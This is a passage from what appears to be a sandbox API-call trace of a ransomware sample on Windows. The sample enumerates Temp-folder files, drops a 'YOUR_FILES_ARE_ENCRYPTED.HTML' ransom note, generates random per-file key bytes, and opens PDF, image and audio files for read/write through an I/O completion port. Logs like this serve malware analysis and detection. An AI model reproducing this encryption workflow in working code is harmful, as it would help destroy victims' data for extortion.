[0122.117] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="ED") returned 2 [0122.117] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="EC") returned 2 [0122.117] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="42") returned 2 [0122.117] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="6F") returned 2 [0122.117] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="32") returned 2 [0122.117] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="F7") returned 2 [0122.117] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="2D") returned 2 [0122.117] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="25") returned 2 [0122.117] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="01") returned 2 [0122.117] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="B8") returned 2 [0122.117] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="0A") returned 2 [0122.117] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="B0") returned 2 [0122.117] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="94") returned 2 [0122.117] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="CD") returned 2 [0122.117] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="61") returned 2 [0122.117] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="54") returned 2 [0122.117] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="13") returned 2 [0122.117] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="F6") returned 2 [0122.117] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="19") returned 2 [0122.117] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="54") returned 2 [0122.117] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="F2") returned 2 [0122.117] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="B4") returned 2 [0122.117] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="65") returned 2 [0122.117] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="04") returned 2 [0122.117] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="3E") returned 2 [0122.118] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\KfJl5xYmaYH.mp4" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\KfJl5xYmaYH.mp4") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\KfJl5xYmaYH.mp4" [0122.118] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.118] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0122.121] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53ffd2c6, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x53ffd2c6, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x53ffd2c6, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Kno51BA.tmp", cAlternateFileName="")) returned 1 [0122.122] StrStrIW (lpFirst="Kno51BA.tmp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.122] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\Kno51BA.tmp") returned 56 [0122.122] PathFindExtensionW (pszPath="Kno51BA.tmp") returned=".tmp" [0122.122] lstrlenW (lpString=".tmp") returned 4 [0122.122] PathFindExtensionW (pszPath="Kno51BA.tmp") returned=".tmp" [0122.122] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4ffa8a42, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x4ffa8a42, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x4ffa8a42, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Low", cAlternateFileName="")) returned 1 [0122.122] StrStrIW (lpFirst="Low", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.122] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\Low") returned 48 [0122.122] GetProcessHeap () returned 0x600000 [0122.122] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0122.123] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\Low" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\Low") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\Low" [0122.123] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\Low", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\Low\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\Low\\*" [0122.123] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\Low\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4ffa8a42, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x4ffa8a42, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x4ffa8a42, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e638, dwReserved1=0x138f888, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0122.124] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4ffa8a42, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x4ffa8a42, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x4ffa8a42, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e638, dwReserved1=0x138f888, cFileName="..", cAlternateFileName="")) returned 1 [0122.124] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4ffa8a42, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x4ffa8a42, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x4ffa8a42, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e638, dwReserved1=0x138f888, cFileName="..", cAlternateFileName="")) returned 0 [0122.124] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0122.124] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\Low\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 78 [0122.124] GetProcessHeap () returned 0x600000 [0122.124] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0122.124] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\Low\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\low\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0122.125] WriteFile (in: hFile=0x308, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0122.126] CloseHandle (hObject=0x308) returned 1 [0122.126] GetProcessHeap () returned 0x600000 [0122.126] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0122.126] GetProcessHeap () returned 0x600000 [0122.126] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0122.126] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x963e40f0, ftCreationTime.dwHighDateTime=0x1d6fac2, ftLastAccessTime.dwLowDateTime=0xc8ca3910, ftLastAccessTime.dwHighDateTime=0x1d6ffc3, ftLastWriteTime.dwLowDateTime=0xc8ca3910, ftLastWriteTime.dwHighDateTime=0x1d6ffc3, nFileSizeHigh=0x0, nFileSizeLow=0x6a38, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="LUA-Ln9ot j PGgqeebz.pdf", cAlternateFileName="LUA-LN~1.PDF")) returned 1 [0122.126] StrStrIW (lpFirst="LUA-Ln9ot j PGgqeebz.pdf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.126] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\LUA-Ln9ot j PGgqeebz.pdf") returned 69 [0122.126] PathFindExtensionW (pszPath="LUA-Ln9ot j PGgqeebz.pdf") returned=".pdf" [0122.126] lstrlenW (lpString=".pdf") returned 4 [0122.126] PathFindExtensionW (pszPath="LUA-Ln9ot j PGgqeebz.pdf") returned=".pdf" [0122.126] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0122.126] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\LUA-Ln9ot j PGgqeebz.pdf" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\lua-ln9ot j pggqeebz.pdf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0122.127] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=27192) returned 1 [0122.127] GetProcessHeap () returned 0x600000 [0122.127] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0122.129] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="70") returned 2 [0122.129] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="AC") returned 2 [0122.129] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="12") returned 2 [0122.129] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="FF") returned 2 [0122.129] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="93") returned 2 [0122.129] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="8D") returned 2 [0122.129] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="13") returned 2 [0122.129] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="78") returned 2 [0122.129] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="49") returned 2 [0122.129] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="2A") returned 2 [0122.129] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="6C") returned 2 [0122.129] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="89") returned 2 [0122.129] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="98") returned 2 [0122.129] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="C2") returned 2 [0122.129] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="9B") returned 2 [0122.129] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="D1") returned 2 [0122.129] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="89") returned 2 [0122.129] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="9D") returned 2 [0122.129] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="AE") returned 2 [0122.129] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="72") returned 2 [0122.129] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="86") returned 2 [0122.129] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="82") returned 2 [0122.129] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="7C") returned 2 [0122.129] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="5A") returned 2 [0122.129] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="F7") returned 2 [0122.129] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="82") returned 2 [0122.129] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="A1") returned 2 [0122.130] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="46") returned 2 [0122.130] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="BA") returned 2 [0122.130] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="31") returned 2 [0122.130] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="1C") returned 2 [0122.130] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="52") returned 2 [0122.130] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\LUA-Ln9ot j PGgqeebz.pdf" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\LUA-Ln9ot j PGgqeebz.pdf") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\LUA-Ln9ot j PGgqeebz.pdf" [0122.130] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.130] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0122.132] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60287a30, ftCreationTime.dwHighDateTime=0x1d70a17, ftLastAccessTime.dwLowDateTime=0x526f070, ftLastAccessTime.dwHighDateTime=0x1d70a6d, ftLastWriteTime.dwLowDateTime=0x526f070, ftLastWriteTime.dwHighDateTime=0x1d70a6d, nFileSizeHigh=0x0, nFileSizeLow=0x12463, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="mgHwyg1y.bmp", cAlternateFileName="")) returned 1 [0122.132] StrStrIW (lpFirst="mgHwyg1y.bmp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.132] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\mgHwyg1y.bmp") returned 57 [0122.132] PathFindExtensionW (pszPath="mgHwyg1y.bmp") returned=".bmp" [0122.132] lstrlenW (lpString=".bmp") returned 4 [0122.132] PathFindExtensionW (pszPath="mgHwyg1y.bmp") returned=".bmp" [0122.132] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0122.134] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\mgHwyg1y.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\mghwyg1y.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0122.138] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=74851) returned 1 [0122.138] GetProcessHeap () returned 0x600000 [0122.138] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0122.140] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="DA") returned 2 [0122.140] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="65") returned 2 [0122.140] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="68") returned 2 [0122.140] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="96") returned 2 [0122.140] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="46") returned 2 [0122.141] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="5D") returned 2 [0122.141] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="6E") returned 2 [0122.141] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="63") returned 2 [0122.141] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="B3") returned 2 [0122.141] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="45") returned 2 [0122.141] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="1F") returned 2 [0122.141] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="4F") returned 2 [0122.141] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="BD") returned 2 [0122.141] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="FA") returned 2 [0122.141] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="23") returned 2 [0122.141] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="1A") returned 2 [0122.141] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="DB") returned 2 [0122.141] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="0D") returned 2 [0122.141] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="17") returned 2 [0122.141] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="4A") returned 2 [0122.141] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="8D") returned 2 [0122.141] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="71") returned 2 [0122.141] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="50") returned 2 [0122.141] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="6C") returned 2 [0122.141] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="4F") returned 2 [0122.141] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="E0") returned 2 [0122.141] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="E2") returned 2 [0122.141] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="D2") returned 2 [0122.141] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="20") returned 2 [0122.141] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="EC") returned 2 [0122.141] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="9B") returned 2 [0122.142] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="1C") returned 2 [0122.142] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\mgHwyg1y.bmp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\mgHwyg1y.bmp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\mgHwyg1y.bmp" [0122.142] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.142] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0122.151] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24a25f50, ftCreationTime.dwHighDateTime=0x1d6fe53, ftLastAccessTime.dwLowDateTime=0x5540e1a0, ftLastAccessTime.dwHighDateTime=0x1d6ff6a, ftLastWriteTime.dwLowDateTime=0x5540e1a0, ftLastWriteTime.dwHighDateTime=0x1d6ff6a, nFileSizeHigh=0x0, nFileSizeLow=0x16689, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="MjiKAEeZY.wav", cAlternateFileName="MJIKAE~1.WAV")) returned 1 [0122.151] StrStrIW (lpFirst="MjiKAEeZY.wav", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.151] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\MjiKAEeZY.wav") returned 58 [0122.151] PathFindExtensionW (pszPath="MjiKAEeZY.wav") returned=".wav" [0122.151] lstrlenW (lpString=".wav") returned 4 [0122.151] PathFindExtensionW (pszPath="MjiKAEeZY.wav") returned=".wav" [0122.151] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0122.151] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\MjiKAEeZY.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\mjikaeezy.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0122.152] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=91785) returned 1 [0122.152] GetProcessHeap () returned 0x600000 [0122.152] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0122.153] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="06") returned 2 [0122.153] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="CA") returned 2 [0122.153] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="3B") returned 2 [0122.153] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="84") returned 2 [0122.153] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="F8") returned 2 [0122.153] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="4D") returned 2 [0122.153] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="76") returned 2 [0122.153] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="14") returned 2 [0122.153] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="7C") returned 2 [0122.153] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="BC") returned 2 [0122.153] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="CD") returned 2 [0122.153] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="48") returned 2 [0122.153] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="C8") returned 2 [0122.153] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="26") returned 2 [0122.153] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="3F") returned 2 [0122.153] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="28") returned 2 [0122.153] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="8A") returned 2 [0122.153] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="36") returned 2 [0122.153] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="15") returned 2 [0122.153] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="64") returned 2 [0122.153] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="9C") returned 2 [0122.153] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="77") returned 2 [0122.154] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="DB") returned 2 [0122.154] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="EA") returned 2 [0122.154] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="0F") returned 2 [0122.154] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="F4") returned 2 [0122.154] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="39") returned 2 [0122.154] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="44") returned 2 [0122.154] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="9A") returned 2 [0122.154] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="90") returned 2 [0122.154] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="BB") returned 2 [0122.154] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="7E") returned 2 [0122.154] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\MjiKAEeZY.wav" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\MjiKAEeZY.wav") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\MjiKAEeZY.wav" [0122.154] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.154] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0122.158] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13c64c70, ftCreationTime.dwHighDateTime=0x1d6fe06, ftLastAccessTime.dwLowDateTime=0x3d383640, ftLastAccessTime.dwHighDateTime=0x1d70a04, ftLastWriteTime.dwLowDateTime=0x3d383640, ftLastWriteTime.dwHighDateTime=0x1d70a04, nFileSizeHigh=0x0, nFileSizeLow=0xa61d, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="MyrMx1J.png", cAlternateFileName="")) returned 1 [0122.158] StrStrIW (lpFirst="MyrMx1J.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.159] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\MyrMx1J.png") returned 56 [0122.159] PathFindExtensionW (pszPath="MyrMx1J.png") returned=".png" [0122.159] lstrlenW (lpString=".png") returned 4 [0122.159] PathFindExtensionW (pszPath="MyrMx1J.png") returned=".png" [0122.159] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0122.159] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\MyrMx1J.png" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\myrmx1j.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, 